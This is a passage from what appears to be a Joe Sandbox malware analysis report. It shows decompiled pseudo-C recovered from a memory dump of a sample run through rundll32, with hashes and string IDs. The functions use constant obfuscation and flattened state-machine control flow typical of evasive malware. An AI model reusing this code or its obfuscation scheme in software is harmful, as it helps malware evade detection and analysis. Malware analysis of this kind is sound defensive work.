                                                                                                                      				_v2724 = 0xcf1521;
                                                                                                                      				_v2724 = _v2724 >> 2;
                                                                                                                      				_v2724 = _v2724 << 0xa;
                                                                                                                      				_v2724 = _v2724 ^ 0xcf1adb57;
                                                                                                                      				_v2728 = 0xc9d07f;
                                                                                                                      				_v2728 = _v2728 + 0xffff241f;
                                                                                                                      				_v2728 = _v2728 + 0xffff5e1a;
                                                                                                                      				_v2728 = _v2728 ^ 0x00c03f16;
                                                                                                                      				_v2632 = 0x51b7a0;
                                                                                                                      				_t497 = 0xd;
                                                                                                                      				_v2632 = _v2632 / _t497;
                                                                                                                      				_v2632 = _v2632 ^ 0x0003c006;
                                                                                                                      				_v2768 = 0xdee1c4;
                                                                                                                      				_t498 = 0x72;
                                                                                                                      				_v2768 = _v2768 * 0x4b;
                                                                                                                      				_v2768 = _v2768 ^ 0x45bd8e4b;
                                                                                                                      				_v2768 = _v2768 + 0x810;
                                                                                                                      				_v2768 = _v2768 ^ 0x04f5c4f4;
                                                                                                                      				_v2620 = 0x673f5;
                                                                                                                      				_v2620 = _v2620 / _t498;
                                                                                                                      				_v2620 = _v2620 ^ 0x0006a8dc;
                                                                                                                      				_v2776 = 0xc1ae10;
                                                                                                                      				_t499 = 0x5a;
                                                                                                                      				_v2776 = _v2776 * 0x5d;
                                                                                                                      				_v2776 = _v2776 / _t499;
                                                                                                                      				_t500 = 0x7a;
                                                                                                                      				_v2776 = _v2776 / _t500;
                                                                                                                      				_v2776 = _v2776 ^ 0x0000f358;
                                                                                                                      				_v2668 = 0x9bfbd0;
                                                                                                                      				_v2668 = _v2668 * 0x2e;
                                                                                                                      				_v2668 = _v2668 ^ 0x1c042184;
                                                                                                                      				_v2700 = 0xcd0c2b;
                                                                                                                      				_v2700 = _v2700 >> 8;
                                                                                                                      				_v2700 = _v2700 + 0xfffff064;
                                                                                                                      				_v2700 = _v2700 ^ 0x0007642a;
                                                                                                                      				_v2708 = 0x1a6cb4;
                                                                                                                      				_v2708 = _v2708 ^ 0x57f593cf;
                                                                                                                      				_v2708 = _v2708 | 0x44881231;
                                                                                                                      				_v2708 = _v2708 ^ 0x57eba098;
                                                                                                                      				_v2752 = 0xd7110a;
                                                                                                                      				_v2752 = _v2752 / _t556;
                                                                                                                      				_v2752 = _v2752 << 0xe;
                                                                                                                      				_v2752 = _v2752 + 0xffff1365;
                                                                                                                      				_v2752 = _v2752 ^ 0x83185000;
                                                                                                                      				_v2760 = 0xc45920;
                                                                                                                      				_v2760 = _v2760 + 0xffffdf34;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xfa48;
                                                                                                                      				_v2760 = _v2760 ^ 0x00031526;
                                                                                                                      				_v2652 = 0x3af3c9;
                                                                                                                      				_v2652 = _v2652 << 0xf;
                                                                                                                      				_v2652 = _v2652 ^ 0x79efd05d;
                                                                                                                      				_v2660 = 0x38b4f1;
                                                                                                                      				_v2660 = _v2660 ^ 0x7076ccd1;
                                                                                                                      				_v2660 = _v2660 ^ 0x704b934c;
                                                                                                                      				_v2744 = 0x6269bc;
                                                                                                                      				_v2744 = _v2744 | 0xfa5eccfb;
                                                                                                                      				_v2744 = _v2744 * 0x5f;
                                                                                                                      				_v2744 = _v2744 << 0xe;
                                                                                                                      				_v2744 = _v2744 ^ 0x9469f4ee;
                                                                                                                      				_v2676 = 0x941055;
                                                                                                                      				_v2676 = _v2676 | 0xfd7f72ef;
                                                                                                                      				_v2676 = _v2676 ^ 0xfdfef17e;
                                                                                                                      				_v2684 = 0x7199f;
                                                                                                                      				_v2684 = _v2684 + 0x9aa9;
                                                                                                                      				_v2684 = _v2684 << 0xe;
                                                                                                                      				_v2684 = _v2684 ^ 0xed16f6de;
                                                                                                                      				_v2644 = 0xf4560;
                                                                                                                      				_v2644 = _v2644 * 0x1c;
                                                                                                                      				_v2644 = _v2644 ^ 0x01a06f93;
                                                                                                                      				_v2692 = 0x891e84;
                                                                                                                      				_v2692 = _v2692 ^ 0x46454346;
                                                                                                                      				_v2692 = _v2692 | 0x068a2534;
                                                                                                                      				_v2692 = _v2692 ^ 0x46ca9877;
                                                                                                                      				_v2736 = 0x29dfc8;
                                                                                                                      				_t471 = _v2736 * 0x19;
                                                                                                                      				_v2736 = _t471;
                                                                                                                      				_v2736 = _v2736 | 0x3d4578d3;
                                                                                                                      				_v2736 = _v2736 >> 4;
                                                                                                                      				_v2736 = _v2736 ^ 0x03d45238;
                                                                                                                      				while(_t553 != 0x2953b22) {
                                                                                                                      					if(_t553 == 0x422d362) {
                                                                                                                      						_t553 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t565 = _t553 - 0xe704baa;
                                                                                                                      						if(_t553 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t553 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E001912A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
                                                                                                                      							 *((short*)(E00184FA8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
                                                                                                                      							E00178650(_v2780,  &_v1560, _t565, _v2696);
                                                                                                                      							_push(_v2712);
                                                                                                                      							_push(_v2664);
                                                                                                                      							_push(0x17181c);
                                                                                                                      							E0017E7CE(E0017AB66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
                                                                                                                      							E0017AE03(_v2628, _v2648, _v2636, _t483);
                                                                                                                      							_t500 = _v2792;
                                                                                                                      							_t471 = E0018C38F(_t500,  &_v2080, _t552, _v2764);
                                                                                                                      							_t558 =  &(_t558[0x15]);
                                                                                                                      							if(_t471 != 0) {
                                                                                                                      								_t553 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t471;
                                                                                                                      				}
                                                                                                                      				_push(_t500);
                                                                                                                      				E0017EA7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
                                                                                                                      				_push(_v2776);
                                                                                                                      				_push(_v2620);
                                                                                                                      				_push(0x17185c);
                                                                                                                      				E0017E7CE(E0017AB66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
                                                                                                                      				_t503 = _v2652;
                                                                                                                      				E0017AE03(_t503, _v2660, _v2744, _t473);
                                                                                                                      				__eflags = 0;
                                                                                                                      				_push(_v2736);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(_v2644);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2684);
                                                                                                                      				_push(_t503);
                                                                                                                      				_push(0);
                                                                                                                      				_t500 =  &_v520;
                                                                                                                      				_t471 = E00179700(_t500, _v2676, 0);
                                                                                                                      				_t558 =  &(_t558[0x1c]);
                                                                                                                      				_t553 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: 709b9e8d03774faf9589d6e20b4cf2b00498f3f9867e8e1bb23e0996c8fb547c
                                                                                                                      • Instruction ID: 32afc34afb4dbb7510f61afb5d46c9ba37945ac3994e191585384c19a630b1de
                                                                                                                      • Opcode Fuzzy Hash: 709b9e8d03774faf9589d6e20b4cf2b00498f3f9867e8e1bb23e0996c8fb547c
                                                                                                                      • Instruction Fuzzy Hash: 002200B1508381DFD368CF25C94AA4BFBE2BBC4708F508A1DE2D986261D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00190D5B() {
                                                                                                                      				void* _t279;
                                                                                                                      				signed char _t284;
                                                                                                                      				intOrPtr _t294;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed char _t309;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				void* _t311;
                                                                                                                      				signed short _t340;
                                                                                                                      				signed int _t341;
                                                                                                                      				intOrPtr _t342;
                                                                                                                      				signed int _t346;
                                                                                                                      				signed int _t349;
                                                                                                                      				signed int _t350;
                                                                                                                      				signed int _t351;
                                                                                                                      				signed int _t352;
                                                                                                                      				signed int _t353;
                                                                                                                      				signed int _t354;
                                                                                                                      				signed int _t355;
                                                                                                                      				signed short* _t359;
                                                                                                                      				void* _t361;
                                                                                                                      
                                                                                                                      				 *(_t361 + 0x80) =  *(_t361 + 0x80) & 0x00000000;
                                                                                                                      				 *(_t361 + 0x74) = 0x716487;
                                                                                                                      				_t302 = 0x4e9f10f;
                                                                                                                      				 *(_t361 + 0x78) = 0xba6397;
                                                                                                                      				 *(_t361 + 0x7c) = 0x705fb8;
                                                                                                                      				 *(_t361 + 0x68) = 0x4c092e;
                                                                                                                      				_t7 = _t361 + 0x68; // 0x4c092e
                                                                                                                      				_t349 = 5;
                                                                                                                      				 *(_t361 + 0x7c) =  *_t7 / _t349;
                                                                                                                      				 *(_t361 + 0x7c) =  *(_t361 + 0x7c) ^ 0x0003a2ba;
                                                                                                                      				 *(_t361 + 0x64) = 0x751de4;
                                                                                                                      				 *(_t361 + 0x64) =  *(_t361 + 0x64) + 0xffff6a51;
                                                                                                                      				 *(_t361 + 0x64) =  *(_t361 + 0x64) ^ 0x007ee7f9;
                                                                                                                      				 *(_t361 + 0x44) = 0x9fd9a3;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 6;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 4;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) ^ 0x7f6c4ffb;
                                                                                                                      				 *(_t361 + 0x28) = 0x22a0e;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) >> 0xb;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) + 0x788;
                                                                                                                      				_t350 = 0x41;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) * 0x62;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) ^ 0x000a9bb9;
                                                                                                                      				 *(_t361 + 0x20) = 0xda6f7f;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 0x62;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 7;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) << 0xa;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) ^ 0x5b1b1cce;
                                                                                                                      				 *(_t361 + 0x74) = 0x2b9064;
                                                                                                                      				 *(_t361 + 0x74) =  *(_t361 + 0x74) + 0x7c5a;
                                                                                                                      				 *(_t361 + 0x74) =  *(_t361 + 0x74) ^ 0x002a32d7;
                                                                                                                      				 *(_t361 + 0x5c) = 0xcbc6c3;
                                                                                                                      				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) * 0x12;
                                                                                                                      				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) ^ 0x0e5c6d3d;
                                                                                                                      				 *(_t361 + 0x40) = 0xfaf28f;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x36c89793;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) | 0x5dfe35bf;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x7ff1266d;
                                                                                                                      				 *(_t361 + 0x3c) = 0x71501;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7d526c09;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) | 0x29ca113d;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7dd950c2;
                                                                                                                      				 *(_t361 + 0x78) = 0x2c4b29;
                                                                                                                      				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa68b4193;
                                                                                                                      				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa6a148a4;
                                                                                                                      				 *(_t361 + 0x50) = 0xa9eb43;
                                                                                                                      				 *(_t361 + 0x50) =  *(_t361 + 0x50) << 4;
                                                                                                                      				 *(_t361 + 0x50) =  *(_t361 + 0x50) ^ 0x0a966e12;
                                                                                                                      				 *(_t361 + 0x24) = 0xf29fdf;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) / _t350;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) | 0x702811c1;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0xfde5eea1;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0x8dc07913;
                                                                                                                      				 *(_t361 + 0x48) = 0x26e009;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xd6899262;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) << 1;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xad52b6d6;
                                                                                                                      				 *(_t361 + 0x1c) = 0xb261a6;
                                                                                                                      				 *(_t361 + 0x1c) =  *(_t361 + 0x1c) + 0x753a;
                                                                                                                      				_t351 = 0x3f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x1c) / _t351;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xffffc68f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x00055965;
                                                                                                                      				 *(_t361 + 0x10) = 0xb29e6;
                                                                                                                      				 *(_t361 + 0x10) =  *(_t361 + 0x10) ^ 0xf1ef7176;
                                                                                                                      				_t352 = 0x53;
                                                                                                                      				_t346 =  *(_t361 + 0x80);
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x10) * 0x52;
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x14) + 0xffff3d5f;
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x14) ^ 0x7b287ee9;
                                                                                                                      				 *(_t361 + 0x6c) = 0xc2349f;
                                                                                                                      				_t359 =  *(_t361 + 0x80);
                                                                                                                      				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) * 0x2b;
                                                                                                                      				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) ^ 0x209b01de;
                                                                                                                      				 *(_t361 + 0x30) = 0xecc1f5;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x10955a53;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) | 0x79713791;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) / _t352;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x017289e0;
                                                                                                                      				 *(_t361 + 0x58) = 0x8daaf;
                                                                                                                      				_t353 = 0xe;
                                                                                                                      				 *(_t361 + 0x58) =  *(_t361 + 0x58) / _t353;
                                                                                                                      				 *(_t361 + 0x58) =  *(_t361 + 0x58) ^ 0x00025281;
                                                                                                                      				 *(_t361 + 0x54) = 0x82784e;
                                                                                                                      				 *(_t361 + 0x54) =  *(_t361 + 0x54) | 0x1fcf3d57;
                                                                                                                      				 *(_t361 + 0x54) =  *(_t361 + 0x54) ^ 0x1fc5386b;
                                                                                                                      				 *(_t361 + 0x2c) = 0xdcbbf5;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 0xa;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 2;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) + 0xffff64c3;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) ^ 0xfffe0972;
                                                                                                                      				 *(_t361 + 0x70) = 0xf032c2;
                                                                                                                      				 *(_t361 + 0x70) =  *(_t361 + 0x70) + 0xffff1f36;
                                                                                                                      				 *(_t361 + 0x70) =  *(_t361 + 0x70) ^ 0x00e5c56e;
                                                                                                                      				 *(_t361 + 0x38) = 0xb1df5b;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xe;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xa;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) ^ 0x5b06c733;
                                                                                                                      				 *(_t361 + 0x18) = 0x22b4d7;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x9a622f3f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xcb3c;
                                                                                                                      				_t354 = 0x1f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) / _t354;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x04f5d5b3;
                                                                                                                      				 *(_t361 + 0x34) = 0xa6176b;
                                                                                                                      				_t355 = 0x3b;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x34) / _t355;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) >> 0xb;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) + 0xffffd9a6;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0xfffb162a;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					L2:
                                                                                                                      					while(1) {
                                                                                                                      						while(_t302 != 0xb6d0a5) {
                                                                                                                      							if(_t302 == 0x1c75f00) {
                                                                                                                      								_push(_t302);
                                                                                                                      								_push(_t302);
                                                                                                                      								_t311 = 0x68;
                                                                                                                      								_t359 = E00183512(_t311);
                                                                                                                      								__eflags = _t359;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t302 = 0xb6d0a5;
                                                                                                                      									goto L17;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t302 == 0x4e9f10f) {
                                                                                                                      									_t342 =  *0x195214; // 0x0
                                                                                                                      									_t302 = 0x8016e2b;
                                                                                                                      									_t341 = _t342 + 4;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t302 == 0x6570a92) {
                                                                                                                      										_t294 =  *0x195214; // 0x0
                                                                                                                      										_t302 = 0xe9e8905;
                                                                                                                      										 *_t341 = _t359;
                                                                                                                      										_t212 =  &(_t359[0x2c]); // 0x58
                                                                                                                      										_t341 = _t212;
                                                                                                                      										_t213 = _t294 + 0x44;
                                                                                                                      										 *_t213 =  *(_t294 + 0x44) + 1;
                                                                                                                      										__eflags =  *_t213;
                                                                                                                      										L12:
                                                                                                                      										 *(_t361 + 0x5c) = _t341;
                                                                                                                      										goto L13;
                                                                                                                      									} else {
                                                                                                                      										if(_t302 == 0x8016e2b) {
                                                                                                                      											_t296 = E0018EAE6(0x195000,  *((intOrPtr*)(_t361 + 0x88)), __eflags,  *(_t361 + 0x6c),  *(_t361 + 0x48), _t361 + 0x84,  *(_t361 + 0x24));
                                                                                                                      											_t361 = _t361 + 0x10;
                                                                                                                      											 *(_t361 + 0x7c) = _t296;
                                                                                                                      											_t346 = _t296;
                                                                                                                      											_t302 = 0x1c75f00;
                                                                                                                      											 *(_t361 + 0x64) = _t296 +  *(_t361 + 0x80);
                                                                                                                      											goto L1;
                                                                                                                      										} else {
                                                                                                                      											if(_t302 == 0x8020f8f) {
                                                                                                                      												E001768DE( *(_t361 + 0x78),  *(_t361 + 0x40),  *(_t361 + 0x1c),  *(_t361 + 0x34),  *(_t361 + 0x7c));
                                                                                                                      											} else {
                                                                                                                      												if(_t302 != 0xe9e8905) {
                                                                                                                      													L19:
                                                                                                                      													__eflags = _t302 - 0x718ec4e;
                                                                                                                      													if(__eflags != 0) {
                                                                                                                      														L17:
                                                                                                                      														_t341 =  *(_t361 + 0x5c);
                                                                                                                      														L13:
                                                                                                                      														continue;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                      													_t302 = (_t302 & 0xf9c54f71) + 0x8020f8f;
                                                                                                                      													continue;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t310 =  *0x195214; // 0x0
                                                                                                                      							 *(_t310 + 0x38) =  *(_t310 + 0x38) & 0x00000000;
                                                                                                                      							 *((intOrPtr*)(_t310 + 0x3c)) =  *((intOrPtr*)(_t310 + 4));
                                                                                                                      							__eflags = 1;
                                                                                                                      							return 1;
                                                                                                                      						}
                                                                                                                      						_push( *((intOrPtr*)(_t361 + 0x4c)));
                                                                                                                      						_push( *(_t361 + 0x78));
                                                                                                                      						 *((char*)(_t361 + 0x53)) =  *((intOrPtr*)(_t346 + 1));
                                                                                                                      						_push(0x17134c);
                                                                                                                      						 *(_t361 + 0x56) =  *((intOrPtr*)(_t346 + 2));
                                                                                                                      						_t279 = E0017AB66( *(_t361 + 0x44),  *(_t361 + 0x40), __eflags);
                                                                                                                      						_t231 =  &(_t359[0x10]); // 0x20
                                                                                                                      						_push(_t279);
                                                                                                                      						E0018BDB5(_t231, __eflags, 0x10,  *(_t361 + 0x54),  *(_t361 + 0x74),  *(_t361 + 0x44),  *(_t361 + 0x38),  *(_t361 + 0x56) & 0x000000ff,  *((intOrPtr*)(_t361 + 0x88)),  *(_t361 + 0x48),  *(_t361 + 0x63) & 0x000000ff,  *(_t346 + 3) & 0x000000ff,  *(_t346 + 3) & 0x000000ff);
                                                                                                                      						E0017AE03( *((intOrPtr*)(_t361 + 0x94)),  *((intOrPtr*)(_t361 + 0x90)),  *(_t361 + 0x64), _t279);
                                                                                                                      						_t361 = _t361 + 0x40;
                                                                                                                      						 *_t359 = ( *(_t346 + 4) & 0x000000ff) << 0x00000008 |  *(_t346 + 5) & 0x000000ff;
                                                                                                                      						_t284 =  *((intOrPtr*)(_t346 + 6));
                                                                                                                      						_t309 =  *((intOrPtr*)(_t346 + 7));
                                                                                                                      						_t346 = _t346 + 8;
                                                                                                                      						_t302 = 0x6570a92;
                                                                                                                      						_t340 = (_t284 & 0x000000ff) << 0x00000008 | _t309 & 0x000000ff;
                                                                                                                      						__eflags = _t340;
                                                                                                                      						_t359[0x28] = _t340;
                                                                                                                      						goto L19;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0019125a
                                                                                                                      0x0019125d
                                                                                                                      0x00000000
                                                                                                                      0x0019125d
                                                                                                                      0x001910ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lR}$&$)K,$.L$:u$Z|$~({
                                                                                                                      • API String ID: 0-3122078039
                                                                                                                      • Opcode ID: d1f7fcd86eaf9d5a1187216a9350842ea404b31f752fb019e45921f68b83075c
                                                                                                                      • Instruction ID: 2b9550f839614f965a33bb2ceea534ce39d3e1c231c8a025d98a825f0a810036
                                                                                                                      • Opcode Fuzzy Hash: d1f7fcd86eaf9d5a1187216a9350842ea404b31f752fb019e45921f68b83075c
                                                                                                                      • Instruction Fuzzy Hash: 77D140B15083819FC368CF65C48995BBBE1FBC4758F148A1DF2DA8A260D3B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0019146E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				unsigned int _v36;
                                                                                                                      				unsigned int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t243;
                                                                                                                      				void* _t248;
                                                                                                                      				void* _t253;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t265;
                                                                                                                      				void* _t270;
                                                                                                                      				void* _t271;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				void* _t298;
                                                                                                                      				void* _t299;
                                                                                                                      				signed int* _t301;
                                                                                                                      				void* _t309;
                                                                                                                      
                                                                                                                      				_t301 =  &_v104;
                                                                                                                      				_v4 = 0xac6d1;
                                                                                                                      				_v4 = _v4 | 0x81c51043;
                                                                                                                      				_v4 = _v4 ^ 0x81ca09c2;
                                                                                                                      				_v8 = 0xb8d74f;
                                                                                                                      				_v8 = _v8 | 0x3a2284f4;
                                                                                                                      				_v8 = _v8 ^ 0x3ab94f49;
                                                                                                                      				_v12 = 0x56dc2c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 ^ 0x0005485d;
                                                                                                                      				_v20 = 0x903a48;
                                                                                                                      				_v20 = _v20 ^ 0xb2572448;
                                                                                                                      				_v20 = _v20 ^ 0xb2cdfeb2;
                                                                                                                      				_v24 = 0x1df316;
                                                                                                                      				_v24 = _v24 * 0x26;
                                                                                                                      				_t271 = __ecx;
                                                                                                                      				_v24 = _v24 ^ 0x04774828;
                                                                                                                      				_t298 = 0;
                                                                                                                      				_v96 = 0x29fbe6;
                                                                                                                      				_t299 = 0x412d246;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 + 0x40e6;
                                                                                                                      				_v96 = _v96 + 0xf8d0;
                                                                                                                      				_v96 = _v96 ^ 0x3f79ed75;
                                                                                                                      				_v28 = 0x5f5eb9;
                                                                                                                      				_v28 = _v28 ^ 0x304beccc;
                                                                                                                      				_v28 = _v28 ^ 0x301ae6f7;
                                                                                                                      				_v16 = 0x707b25;
                                                                                                                      				_v16 = _v16 | 0xc66cf16b;
                                                                                                                      				_v16 = _v16 ^ 0xc674099c;
                                                                                                                      				_v68 = 0x422c76;
                                                                                                                      				_v68 = _v68 >> 5;
                                                                                                                      				_v68 = _v68 ^ 0x51e03a27;
                                                                                                                      				_v68 = _v68 ^ 0x51e925f4;
                                                                                                                      				_v72 = 0x838679;
                                                                                                                      				_t273 = 0x50;
                                                                                                                      				_v72 = _v72 / _t273;
                                                                                                                      				_t274 = 0xb;
                                                                                                                      				_v72 = _v72 / _t274;
                                                                                                                      				_v72 = _v72 ^ 0x0007ebfd;
                                                                                                                      				_v92 = 0x3398da;
                                                                                                                      				_t275 = 0x26;
                                                                                                                      				_v92 = _v92 * 0x6d;
                                                                                                                      				_v92 = _v92 ^ 0x75ca49c7;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 ^ 0x0c9e0967;
                                                                                                                      				_v48 = 0x734a11;
                                                                                                                      				_v48 = _v48 >> 0xa;
                                                                                                                      				_v48 = _v48 ^ 0x00076871;
                                                                                                                      				_v52 = 0xdc5b30;
                                                                                                                      				_v52 = _v52 ^ 0x2a73247b;
                                                                                                                      				_v52 = _v52 ^ 0x2aa1f0d2;
                                                                                                                      				_v104 = 0x2f7cf6;
                                                                                                                      				_v104 = _v104 / _t275;
                                                                                                                      				_v104 = _v104 * 0x41;
                                                                                                                      				_v104 = _v104 | 0xaae37d31;
                                                                                                                      				_v104 = _v104 ^ 0xaaffffad;
                                                                                                                      				_v56 = 0xefab9e;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 ^ 0x0008ac09;
                                                                                                                      				_v80 = 0xd17701;
                                                                                                                      				_t276 = 0x57;
                                                                                                                      				_v80 = _v80 / _t276;
                                                                                                                      				_v80 = _v80 + 0xffff6938;
                                                                                                                      				_v80 = _v80 ^ 0x000bb913;
                                                                                                                      				_v44 = 0x9eed53;
                                                                                                                      				_t277 = 0x32;
